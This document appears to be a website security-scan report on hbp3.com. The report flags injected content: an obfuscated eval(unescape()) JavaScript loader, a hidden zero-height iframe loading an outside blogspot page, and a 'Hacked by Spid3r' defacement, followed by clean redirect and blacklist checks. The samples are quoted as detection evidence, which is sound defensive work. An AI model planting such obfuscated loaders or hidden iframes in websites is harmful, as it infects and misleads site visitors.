Scanned pages/files
Request | Server response | Status |
http://hbp3.com/ | 200 OK Content-Length: 5860 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(unescape('%66%75%6e%63%74%69%6f%6e%20%75%39%39%36%38%61%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%37%32%32%34%39%31%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%39%35%31%32%34%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%7 ...[1075 bytes skipped]... Decoded script: ...[1438 bytes skipped]... e%1a%6c%65%1a%1c%68%5a%6a%63%62%6e%66%66%63%63%6c%74%3b%1d%29%68%72%1b%18%69%5a%6a%63%6f%6e%75%64%65%74%62%3e%1a%2e%69%70%18%14%6e%5f%68%66%3f%18%5b%6c%69%5a%65%18%14%75%6e%62%3e%1a%62%75%74%6e%33%29%2b%26%64%5f%74%6e%69%58%62%6c%61%2f%5a%6e%65%61%71%6f%68%74%2c%64%69%69%1b%18%77%78%73%68%60%3e%1a%58%68%6a%62%66%6a%30%14%28%6c%77%19%25%44%47%46%40%47%46%1a%62%69%6a%60%3c%1a%3c%3d%29%65%67%6a%59%63%67%3a7224910%35%37%34%35%33%34%35')); <iframe width="100%" height="0" frameborder="0" scrolling="no" marginheight="0px" marginwidth="0px" name="blmac" src="http://2daymobile.blogspot.com" style="border: 0px #FFFFFF none;"></iframe> Deface/Content modification. The following signature was found: Hacked by Spid3r <head>
<title>Hacked by Spid3r</title> <link rel="SHORTCUT ICON" type="image/x-icon" href="https://scontent-a-ams.xx.fbcdn.net/hphotos-prn2/t1.0-9/10320422_1392463094373475_56069615978506468_n.jpg"> <meta content='Hacked By Spider' name='description'/> <meta content='Spid3r,Hacked By spider,Defaced by blackface team,spider Was Here,hacked' name='keywords'/> <meta content='--Spider---' name='Auth ...[6881 bytes skipped]... | ||
http://hbp3.com/test404page.js | 200 OK Content-Length: 5860 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(unescape('%66%75%6e%63%74%69%6f%6e%20%75%39%39%36%38%61%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%37%32%32%34%39%31%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%39%35%31%32%34%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%7 ...[1075 bytes skipped]... Decoded script: ...[1438 bytes skipped]... e%1a%6c%65%1a%1c%68%5a%6a%63%62%6e%66%66%63%63%6c%74%3b%1d%29%68%72%1b%18%69%5a%6a%63%6f%6e%75%64%65%74%62%3e%1a%2e%69%70%18%14%6e%5f%68%66%3f%18%5b%6c%69%5a%65%18%14%75%6e%62%3e%1a%62%75%74%6e%33%29%2b%26%64%5f%74%6e%69%58%62%6c%61%2f%5a%6e%65%61%71%6f%68%74%2c%64%69%69%1b%18%77%78%73%68%60%3e%1a%58%68%6a%62%66%6a%30%14%28%6c%77%19%25%44%47%46%40%47%46%1a%62%69%6a%60%3c%1a%3c%3d%29%65%67%6a%59%63%67%3a7224910%35%37%34%35%33%34%35')); <iframe width="100%" height="0" frameborder="0" scrolling="no" marginheight="0px" marginwidth="0px" name="blmac" src="http://2daymobile.blogspot.com" style="border: 0px #FFFFFF none;"></iframe> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hbp3.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jul 2015 19:31:07 GMT
Server: nginx/1.8.0
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: hbp3.com
Referer: http://www.google.com/search?q=hbp3.com
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hbp3.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hbp3.com/
Result: hbp3.com is not infected or malware details are not published yet.